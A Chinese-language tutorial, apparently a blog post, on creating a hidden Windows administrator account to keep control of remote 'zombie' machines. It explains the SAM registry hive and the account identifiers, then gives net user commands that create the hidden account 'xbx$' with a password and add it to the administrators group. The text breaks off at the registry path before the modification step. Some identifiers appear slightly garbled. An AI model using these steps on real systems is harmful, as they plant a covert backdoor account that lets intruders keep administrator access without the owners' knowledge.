前段時間比較流行的一句話”肉機”其實要想控制遠端的計算機,那我想就少不了隱藏用戶帳號的問題了,其實創建隱藏用戶帳號還是比較簡單的,現在我就把創建隱藏用戶帳號告訴大家。
其實每一個用戶帳號在注冊表中都有自己帳號數據項:
首先我們看看管理員在注冊表中的數據項是什麼樣的(如下圖)
SAM是保存用戶帳號的地方,不過這個“項”在默認情況下是不可見的。我們如果想看內部的內容就必須首先對其授權。(建議對注冊表不是很熟悉的朋友不要隨便改動注冊表)
在OS中的用戶帳號無論是內置帳號,還是後建帳號,在注冊表中都能看見。不過有兩個帳號大家一定要能夠認識,那就是管理員帳號和guest帳號。(如下圖)
在這個圖中”000001fa4”表示的是管理員帳號,即使管理員帳號被重命名了這個值也是不會變的,所以我們可以通過這個值來判斷,重命名後的管理員帳號。
“000001fa5”表示的是guest帳號,同樣這個值也不會因為,來賓帳號給重命名而改變。剩下的其
它值基本上就是後來創建的用戶帳號,生成值了。
認識了注冊表後,現在我們就來利用”net user”命令創建帳號了,創建隱藏帳號必須在CMD下。利用這組命令的,如果不熟悉這個命令使用的朋友可以參照我的另外一篇文章,就是有關常見命令的時候,不過這些命令也可以在OS的幫助中找到。
一、先建立隱藏用戶 xbx$
1、 net user xbx$ 123,abc /add
這裡的意思是說,建立個xbx$ 帳戶密碼是123,abc(如下圖)
1、 C:\Documents and Settings\Administrator>net localgroup administrators xbx$ /add
這裡的意思是說把xbx$用戶添加到管理組,以便讓我們創建用戶具備管理員權限。
一、觀察注冊表中的變化,並對注冊表做相應的修改。
HKEY_LOCAL_MACHINE\SAM\SAM
